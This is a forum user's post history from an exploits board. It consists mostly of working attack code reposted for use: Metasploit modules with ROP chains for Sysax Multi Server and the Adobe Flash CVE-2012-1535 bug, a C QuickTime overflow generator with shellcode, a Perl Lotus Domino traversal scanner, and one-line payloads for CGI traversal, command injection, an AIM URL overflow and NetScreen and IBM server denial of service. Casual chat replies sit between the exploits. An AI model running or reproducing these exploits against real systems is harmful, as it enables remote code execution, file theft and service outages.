Everything posted by DarkLegion
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the create folder function in
        Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the
        vulnerability valid credentials with the create folder permission must be
        provided. The HTTP option must be enabled on Sysax too. This module will log
        into the server, get a SID token, find the root folder, and then proceed to
        exploit the server. Successful exploits result in SYSTEM access. This exploit
        works on XP SP3, and Server 2003 SP1-SP2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt "hostess" Andreko',
        ],
      'References'     =>
        [
          [ 'EDB', '20676' ],
          [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s
          'Space'       => '1299',
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3 / Sysax Multi Server 5.64',
            {
              'Rop'    => false,
              'Ret'    => 0x77c35459, # push esp # ret [msvcrt.dll]
              'Offset' => 711,
            }
          ],
          [ 'Windows 2003 SP1-SP2 / Sysax Multi Server 5.64',
            {
              'Rop'    => true,
              'Ret'    => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot)
              'Offset' => 711,
              'Nop'    => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 29 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']),
        Opt::RPORT(80),
        OptString.new('SysaxUSER', [ true, "Username" ]),
        OptString.new('SysaxPASS', [ true, "Password" ])
      ], self.class)
  end

  def create_rop_chain()
    rop_gadgets = []

    # ROP chains provided by Corelan.be
    # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2
    if (target == targets[1]) # Windows 2003
      rop_gadgets =
      [
        0x77be3adb, # POP EAX # RETN [msvcrt.dll]
        0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
        0x41414141, # Filler (compensate)
        0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
        0x77bdb896, # POP EBP # RETN [msvcrt.dll]
        0x77be2265, # & push esp # ret [msvcrt.dll]
        0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
        0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
        0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
        0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
        0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
        0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
        0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
        0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
        0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
        0x77befbb4, # &Writable location [msvcrt.dll]
        0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
        0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
        0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
        0x90909090, # nop
        0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
      ].flatten.pack("V*")
    end

    return rop_gadgets
  end

  def get_sid
    user = datastore['SysaxUSER']
    pass = datastore['SysaxPASS']
    creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"

    # Login to get SID value
    r = send_request_cgi({
      'method' => "POST",
      'uri'    => "#{target_uri.to_s}scgi?sid=0&pid=dologin",
      'data'   => creds
    })

    # Parse response for SID token
    sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1]
    print_status "SID: #{sid.to_s}"
    sid.to_s
  end

  def get_root_path(sid)
    # Find the path because it's used to help calculate the offset
    random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
    r = send_request_cgi({
      'uri'    => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
      'method' => 'POST',
    })

    # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2.
    # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash)
    root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1]
    print_status "Root Dir: #{root_path}"
    root_path
  end

  def exploit
    connect
    sid = get_sid
    root_path = get_root_path(sid)

    buffer = rand_text(target['Offset']-root_path.length)
    buffer << [target.ret].pack('V')
    if (target['Rop'])
      buffer << [target['Nop']].pack('V')*16
      buffer << create_rop_chain()
    end
    buffer << make_nops(15)
    buffer << payload.encoded

    post_data = Rex::MIME::Message.new
    post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"")
    post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"

    r = send_request_cgi({
      'uri'    => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
      'method' => 'POST',
      'data'   => post_data.to_s,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
    })

    disconnect
  end
end
-
Adobe Flash Player 11.3 Font Parsing Code Execution
DarkLegion replied to DarkLegion's topic in Exploits
Yeah.. sorry I posted it without the source.. I forgot about it
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player 11.3 Font Parsing Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in the ActiveX component of Adobe
        Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the
        SWF, it is possible to gain arbitrary remote code execution under the context
        of the user, as exploited in the wild.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Alexander Gavrun', # Through iDefense
          'sinn3r',
          'juan vazquez'
        ],
      'References'     =>
        [
          [ 'CVE', '2012-1535' ],
          [ 'OSVDB', '84607' ],
          [ 'BID', '55009' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ],
          [ 'URL', 'http://vrt-blog.snort.org/2012/08/cve-2012-1535-flash-0-day-in-wild.html' ],
          [ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ]
        ],
      'Payload'        =>
        {
          'Space' => 1024
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested successfully on:
          # Flash 11.3.300.268
          # Flash 11.3.300.265
          # Flash 11.3.300.257
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => true } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 9 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]),
      ], self.class)
  end

  def nop
    return make_nops(4).unpack("L")[0].to_i
  end

  def get_payload(t, flash_version=nil)
    if t['Rop'].nil?
      p = [
        0x0c0c0c0c, # mapped at 1e0d0000
        0x0c0c0c0c,
        0x0c0c0c0c, # mapped at 1e0d0008
      ].pack("V*")
      p << payload.encoded
    else
      if datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
        print_status("Using Rop Chain For Flash: #{flash_version}")
        stack_pivot = [
          0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
          0x0c0c0c0c,
          0x1001d891, # xchg eax, esp # ret (1e0d0008)
        ].pack("V*")

        rop = [
          0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
          0x106e3384, # <- *&VirtualProtect()
          0x1029de2f, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_257.ocx)
          0x106add37, # XCHG EAX,ESI # RETN (Flash32_11_3_300_257.ocx)
          0x1064e000, # POP EBP # RETN (Flash32_11_3_300_257.ocx)
          0x10175c57, # ptr to 'jmp esp' (from Flash32_11_3_300_257.ocx)
          0x106a4010, # POP EBX # RETN (Flash32_11_3_300_257.ocx)
          0x00000201, # <- change size to mark as executable if needed (-> ebx)
          0x104de800, # POP ECX # RETN (Flash32_11_3_300_257.ocx)
          0x10955000, # W pointer (lpOldProtect) (-> ecx)
          0x10649003, # POP EDI # RETN (Flash32_11_3_300_257.ocx)
          0x10649004, # ROP NOP (-> edi)
          0x10649987, # POP EDX # RETN (Flash32_11_3_300_257.ocx)
          0x00000040, # newProtect (0x40) (-> edx)
          0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
          nop,        # NOPS (-> eax)
          0x1060e809, # PUSHAD # RETN (Flash32_11_3_300_257.ocx)
        ].pack("V*")
      elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
        print_status("Using Rop Chain For Flash: #{flash_version}")
        stack_pivot = [
          0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
          0x0c0c0c0c,
          0x1001d6d3, # xchg eax, esp # ret (1e0d0008)
        ].pack("V*")

        rop = [
          0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
          0x106e338c, # <- *&VirtualProtect()
          0x1029ea04, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_265.ocx)
          0x103d60b8, # XCHG EAX,ESI # RETN (Flash32_11_3_300_265.ocx)
          0x105cc000, # POP EBP # RETN (Flash32_11_3_300_265.ocx)
          0x1001c5cd, # ptr to 'jmp esp' (from Flash32_11_3_300_265.ocx)
          0x10398009, # POP EBX # RETN (Flash32_11_3_300_265.ocx)
          0x00000201, # <- change size to mark as executable if needed (-> ebx)
          0x10434188, # POP ECX # RETN (Flash32_11_3_300_265.ocx)
          0x10955000, # W pointer (lpOldProtect) (-> ecx)
          0x105c1811, # POP EDI # RETN (Flash32_11_3_300_265.ocx)
          0x105c1812, # ROP NOP (-> edi)
          0x10650602, # POP EDX # RETN (Flash32_11_3_300_265.ocx)
          0x00000040, # newProtect (0x40) (-> edx)
          0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
          nop,        # NOPS (-> eax)
          0x1062800f, # PUSHAD # RETN (Flash32_11_3_300_265.ocx)
        ].pack("V*")
      elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
        print_status("Using Rop Chain For Flash: #{flash_version}")
        stack_pivot = [
          0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
          0x0c0c0c0c,
          0x1001d755, # xchg eax, esp # ret (1e0d0008)
        ].pack("V*")

        rop = [
          0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
          0x106e438c, # <- *&VirtualProtect()
          0x10198e00, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_268.ocx)
          0x106ddf15, # XCHG EAX,ESI # RETN (Flash32_11_3_300_268.ocx)
          0x1035f000, # POP EBP # RETN (Flash32_11_3_300_268.ocx)
          0x10175c28, # ptr to 'jmp esp' (from Flash32_11_3_300_268.ocx)
          0x105e0013, # POP EBX # RETN (Flash32_11_3_300_268.ocx)
          0x00000201, # <- change size to mark as executable if needed (-> ebx)
          0x10593801, # POP ECX # RETN (Flash32_11_3_300_268.ocx)
          0x1083c000, # RW pointer (lpOldProtect) (-> ecx)
          0x10308b0e, # POP EDI # RETN (Flash32_11_3_300_268.ocx)
          0x10308b0f, # ROP NOP (-> edi)
          0x10663a00, # POP EDX # RETN (Flash32_11_3_300_268.ocx)
          0x00000040, # newProtect (0x40) (-> edx)
          0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
          nop,        # NOPS (-> eax)
          0x1069120b, # PUSHAD # RETN (Flash32_11_3_300_268.ocx)
        ].pack("V*")
      else
        print_status("Default back to JRE ROP")
        stack_pivot = [
          0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)
          0x0c0c0c0c,
          0x7c348b05, # xchg eax, esp # ret (1e0d0008)
        ].pack("V*")

        rop = [
          0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
          0x00001000, # (dwSize)
          0x7c347f98, # RETN (ROP NOP)
          0x7c3415a2, # JMP [EAX]
          0xffffffff,
          0x7c376402, # skip 4 bytes
          0x7c345255, # INC EBX # FPATAN # RETN
          0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
          0x7c344f87, # POP EDX # RETN
          0x00000040, # flNewProtect
          0x7c34d201, # POP ECX # RETN
          0x7c38b001, # &Writable location
          0x7c347f97, # POP EAX # RETN
          0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
          0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
          0x7c345c30, # ptr to 'push esp # ret '
        ].pack("V*")
      end

      p = stack_pivot
      p << rop
      p << payload.encoded
    end

    return p
  end

  def get_target(agent)
    # If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1] # IE 6 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[2] # IE 7 on Windows XP SP3
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[3] # IE 8 on Windows XP SP3
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("User-agent: #{agent}")
    my_target = get_target(agent)

    print_status("Client requesting: #{request.uri}")

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("Browser not supported: #{agent}")
      send_not_found(cli)
      return
    end

    # The SWF request itself
    if request.uri =~ /\.swf$/
      print_status("Sending SWF")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
      return
    end

    # The TXT payload request
    if request.uri =~ /\.txt$/
      flash_version = request.headers['x-flash-version']
      shellcode = get_payload(my_target, flash_version).unpack('H*')[0]
      print_status("Sending Payload")
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
      return
    end

    swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"

    html = %Q|
		<html>
		<head>
		</head>
		<body>
		<object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
		<param name="movie" value="#{swf_uri}">
		</object>
		</body>
		</html>
    |

    html = html.gsub(/^\t\t/, '')

    # we need to handle direct /pay.txt requests
    proc = Proc.new do |cli, req|
      on_request_uri(cli, req)
    end
    add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil

    print_status("Sending HTML")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def exploit
    @swf = create_swf
    print_status("SWF Loaded: #{@swf.length.to_s} bytes")
    super
  end

  def create_swf
    path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" )
    fd = ::File.open( path, "rb" )
    swf = fd.read(fd.stat.size)
    fd.close

    return swf
  end

  def cleanup
    vprint_status("Removing txt resource")
    remove_resource('/pay.txt') rescue nil
    super
  end
end

source
-
What the fuck is this? I wasn't scared at all
-
Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow. A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.

/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  ====================================================================
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
    "<html><embed src=\"%s\" href=\"%s\" "\
    "width=%d height=%d autoplay=\"true\" "\
    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char exploit_code[200]={
    0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
    0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
    0xFF,0xD0,0x00,
};

int main(int argc,char *argv[])
{
    FILE    *fp;
    char    buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION    meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [sample .mov file]\n",
               argv[0]);
        exit(1);
    }
    /* Load ESP_TGT and scan its first region for the JMPESP_1/JMPESP_2 byte pair */
    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
        printf("%s is not found.\n",ESP_TGT);
        exit(1);
    }
    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        /* addresses containing a zero byte are skipped */
        if ( ( p &0xff)==0 || ((p>>8 )&0xff)==0 ||
             ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue;
        if ( *((unsigned char *)p)==JMPESP_1 &&
             *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen((char *)exploit_code));
    buf[BUFSIZE-2]=0;
    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;
    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
    return 0;
}

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
  shadowpenguin@backsection.net (SPS-Official)
  unyun@shadowpenguin.org (Personal)
% eEye Digital Security Team
  unyun@eEye.com

source
-
So will someone tell me the password for warmup5?
-
Nice, well done
-
bbs_forum.cgi is a popular Perl cgi script from eXtropia.com. It supports the creation and maintenance of web-based threaded discussion forums. Version 1.0 of bbs_forum.cgi fails to properly validate user-supplied, URL-encoded input to the read environment variable. Maliciously-formed URLs submitted to the script may contain references to files on the host's filesystem, as well as shell commands which will be run with the privilege level of the webserver (i.e., user 'nobody'). As a result, unpatched affected versions of the script permit an attacker to execute arbitrary code and to read arbitrary files on the vulnerable system.

www.web*site.com/cgi-bin/bbs_forum.cgi?forum=<forum_name>&read=../../../../../../etc/hosts.allow

note: The section <forum_name> must be a valid forum on the webserver.

source
-
NetScreen Firewall is a network appliance used to secure against intruders and various types of attacks to a network. NetScreen has a Web administrative Interface (WebUI) used to configure and set the firewall settings. It is possible to cause a denial of service in NetScreen Firewall. Requesting an unusually long URL to WebUI listening on default port 80 will cause the firewall to crash. A restart of the service is required in order to gain normal functionality. Once the input URL is longer than 1220 bytes, NetScreen firewall will crash:

$echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc netscreen_firewall 80

SOURCE
-
IBM HTTP Server contains the AfpaCache directive, which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server. Both IBM HTTP Server and WebSphere are subject to a denial of service. This is caused by exhausting computer resources with malformed HTTP GET requests. A restart of the service is required in order to gain normal functionality.

GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n

This request must be made multiple times before the system will freeze.

SOURCE
-
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename will display the contents of the particular file with read permissions. Successful exploitation of this vulnerability could enable a remote user to gain access to system files, password files, etc. This could lead to a complete compromise of the host.

#!/usr/bin/perl
# PERL script to test a Domino server for directory
# traversal vulnerability. (BugTraq ID 2173,
# Lotus Domino Server Directory Traversal Vulnerability)
#
# Michael Smith, www.netlocksmith.com
# 01/15/2001
#
# Credit & thanks to all of these folks:
#
# - To Georgi Guninski, georgi,
#   who discovered the original vulnerability,
#   and Ralph Moonen of KPMG, who found additional
#   URL variations
#
# - Roelof Temmingh, SensePost - SensePost Information Security,
#   author of unicodecheck.pl, on which this
#   script is based
#
# - Rain Forest Puppy, www.wiretrip.com,
#   author of Sendraw routine
#

use Socket;

# --------------init
if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]";}
($host,$port)=split(/:/,$ARGV[0]);
if (!defined $port || $port eq "") {$port=80;}
print "Testing $host:$port\n";
$target = inet_aton($host);
$flag=0;

# Each variation of the traversal path tried against the server
@notesvuln=(
  "/%00%00.nsf/../lotus/domino/notes.ini",
  "/%00%20.nsf/../lotus/domino/notes.ini",
  "/%00%c0%af.nsf/../lotus/domino/notes.ini",
  "/%00...nsf/../lotus/domino/notes.ini",
  "/%00.nsf//../lotus/domino/notes.ini",
  "/%00.nsf/../lotus/domino/notes.ini",
  "/%00.nsf/..//lotus/domino/notes.ini",
  "/%00.nsf/../../lotus/domino/notes.ini",
  "/%00.nsf.nsf/../lotus/domino/notes.ini",
  "/%20%00.nsf/../lotus/domino/notes.ini",
  "/%20.nsf//../lotus/domino/notes.ini",
  "/%20.nsf/..//lotus/domino/notes.ini",
  "/%c0%af%00.nsf/../lotus/domino/notes.ini",
  "/%c0%af.nsf//../lotus/domino/notes.ini",
  "/%c0%af.nsf/..//lotus/domino/notes.ini",
  "/...nsf//../lotus/domino/notes.ini",
  "/...nsf/..//lotus/domino/notes.ini",
  "/.nsf///../lotus/domino/notes.ini",
  "/.nsf//../lotus/domino/notes.ini",
  "/.nsf//..//lotus/domino/notes.ini",
  "/.nsf/../lotus/domino/notes.ini",
  "/.nsf/../lotus/domino/notes.ini",
  "/.nsf/..///lotus/domino/notes.ini",
  "/.nsf%00.nsf/../lotus/domino/notes.ini",
  "/.nsf.nsf//../lotus/domino/notes.ini",
  "/.nsf.nsf/..//lotus/domino/notes.ini");

# ----- Test each possible version of vulnerability -----
foreach $notespath (@notesvuln) {
  my @results=sendraw("GET ".$notespath." HTTP\/1.0\r\n\r\n");
  foreach $line (@results){
    # a notes.ini section header in the response means the file was served
    if ($line =~ /\[Notes\]/) {$flag=1;}
  }
}

if ($flag==0) {die("No vulnerability found at this address.\n");}
else {die("This site is vulnerable.\n");}

# ------------- Sendraw
sub sendraw {
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
    die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    my @in;
    select(S); $|=1; print $pstr;
    while(<S>){ push @in, $_;}
    select(STDOUT); close(S); return @in;
  } else { die("Can't connect...\n"); }
}
# ----------------------

SOURCE
-
any hint for warmup5?
-
AOL Instant Messenger 'aim://' Buffer Overflow Vulnerability
DarkLegion posted a topic in Exploits
AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters. This vulnerability exists in versions of AOL Instant Messenger previous to 4.3.2229. By sending a specially crafted URL, using the 'aim:' protocol, comprised of 'goim' and 'screenname' parameters, it is possible for a remote user to overflow the buffer during a memory copy operation and execute arbitrary code. It should be noted that the victim need only have AIM installed on their machine to be vulnerable. Even if AIM is not running, if a user clicks or otherwise activates a malicious aim:// url, the overflow will occur. Additionally it should be noted that AIM is often included/bundled with Netscape Communicator and possibly other popular software programs. Successful exploitation of this vulnerability will lead to complete compromise of the target host.

<a href="aim:goim?screenname=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&message=EIP,+the+other+white+meat">here</a><br>

SOURCE
-
source: Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability

A vulnerability exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms. An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver.

<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>

SOURCE
-
EPIC FAIL! There's no way to do something like that
-
https://rstcenter.com/forum/56493-best-free-vpn.rst was it that hard to look here?
-
What do you think about Windows 8?
DarkLegion replied to Krisler12™'s topic in Operating Systems and Hardware Discussions
I tried it too and I'm happy with it.. but it has some flaws.. off: For those of you who want to test it and can't on your own PC, go HERE!! with a US/UK proxy/nologin and make an account, choose Windows 8, then connect via Remote Desktop (start->programs etc..) with the details shown in "view environment"
-
The name is the one on the back, but it has an E71 case.. a very bad copy
-
You want to go "boom"? Don't take powders like these or you'll end up looking like hell
-
You could at least have posted the source, damn it
-
I also posted a few nologins and a tutorial.. the ones that have @DarkLegion at the end. VIP or something? My name is DarkLegion
-
Yeah dad, what else should I teach you? Go to the police and curse all their dead and you'll get the Nobel prize